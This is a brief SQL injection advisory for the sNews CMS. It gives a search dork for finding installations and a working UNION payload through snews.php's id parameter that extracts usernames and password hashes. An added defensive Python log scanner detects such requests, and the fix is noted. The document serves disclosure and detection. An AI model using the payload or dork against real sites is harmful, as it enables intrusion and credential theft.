Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

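Added example (not part of the original advisory and not sNews code): a Python check a defender can run over web-server access logs to flag act=shownews requests to snews.php whose id parameter is not a plain integer, which is the condition the PoC above relies on. The log lines are constructed, and the access-log layout is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2013:10:00:01 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Jan/2013:10:00:07 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,2/**/from/**/snews_user HTTP/1.1" 200 6011
203.0.113.9 - - [10/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=12abc HTTP/1.1" 200 5120
198.51.100.2 - - [10/Jan/2013:10:00:12 +0000] "GET /favicon.ico HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(union|select|from|where|like|concat|char)\b", re.I)


def classify_id(raw_id):
    """Return 'ok', 'non-numeric' or 'sqli' for a URL-decoded id value."""
    if re.fullmatch(r"\d{1,10}", raw_id):
        return "ok"
    # Inline comments (/**/ or a trailing /*) stand in for whitespace.
    normalized = re.sub(r"/\*.*?\*/|/\*", " ", raw_id)
    return "sqli" if SQL_TOKENS.search(normalized) else "non-numeric"


def scan(log_text):
    """Return (client, verdict, id) for each suspicious shownews request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
            continue
        for raw_id in params.get("id", [""]):  # a missing id is also reported
            verdict = classify_id(raw_id)
            if verdict != "ok":
                findings.append((client, verdict, raw_id))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer test, applied in the application before id reaches the SQL query (or a parameterized query in its place), closes the injection point.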
Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*